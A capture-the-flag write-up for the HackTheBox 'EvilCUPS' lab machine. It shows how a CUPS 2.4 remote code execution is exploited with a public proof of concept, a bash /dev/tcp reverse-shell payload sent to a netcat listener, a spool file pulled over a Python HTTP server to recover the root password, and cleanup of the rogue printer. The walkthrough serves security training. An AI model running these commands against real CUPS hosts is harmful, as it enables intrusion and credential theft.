HackTheBox EvilCUPS Writeup
Explore the fundamentals of cybersecurity in the EvilCUPS Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.40 evilcups.htb
Script to add hosts automatically
ip="10.10.11.40"
domain="evilcups.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV evilcups.htb
Nmap scan report for evilcups.htb (10.10.11.40)
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
|_ 256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
631/tcp open ipp CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can access the CUPS interface at http://10.10.11.40:631.
Remote Code Execution (RCE)
This attack is described in detail here:
https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
The proof of concept (PoC) was created by the room creator and can be found here:
https://github.com/IppSec/evil-cups
Start a Listener
Set up a listener to capture the reverse shell:
nc -lvnp 9001
Download and Set Up the Exploit
You’ll need the Python ippserver package for the CUPS exploit.
wget https://raw.githubusercontent.com/IppSec/evil-cups/refs/heads/main/evilcups.py -O evilcups
chmod +x evilcups
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
./evilcups $vpnip 10.10.11.40 'bash -c "nohup bash -i >& /dev/tcp/'$vpnip'/9001 0>&1"&'
Trigger the RCE
To trigger the reverse shell, go to the CUPS web interface at http://10.10.11.40:631. Find the added printer, click on “Maintenance,” and then click on “Print Test Page.”
Retrieve the User Flag
Once you have shell access, you can retrieve the user flag:
cat /home/htb/user.txt
Explore CUPS Spool Files
Navigate to the CUPS spool directory to inspect the files:
cd /var/spool/cups
cat d00001-001
Set up a Python HTTP server to transfer the file:
python3 -m http.server
Download and Convert the Spool File
On your local machine, download the spool file:
wget 'http://10.10.11.40:8000/d00001-001'
Convert the file to PDF format:
ps2pdf d00001-001 d00001-001.pdf
Open the PDF to inspect its contents:
xdg-open d00001-001.pdf
Retrieve the Root Password
With the information gathered, SSH into the box as root:
ssh root@10.10.11.40
Retrieve the root flag:
cat /root/root.txt
Good OpSec: Removing a Malicious Printer from CUPS
List Active Printers
Check which printers are currently active:
lpstat -p
Example:
printer Canon_MB2300_series is idle.
printer HACKED_10_10_14_2 is idle.
Attempt Printer Removal
Try to remove the malicious printer:
lpadmin -x HACKED_10_10_14_2
Restart CUPS
Apply changes by restarting the CUPS service:
systemctl restart cups
Verify Removal
Check again to ensure the printer is removed:
lpstat -p
Manual Removal (If Necessary)
If lpadmin fails, manually edit the printer configuration:
nano /etc/cups/printers.conf
Delete the section for the unwanted printer:
<Printer HACKED_10_10_14_2>
...
</Printer>
Save and exit (Ctrl + O, Ctrl + X).
Clear CUPS Cache
Remove the CUPS job cache:
rm /var/cache/cups/job.cache
Important: Only clear spool files if you are sure there’s no sensitive data:
rm /var/spool/cups/d* /var/spool/cups/c*
Note: On this machine, avoid removing spool files because they contain the password.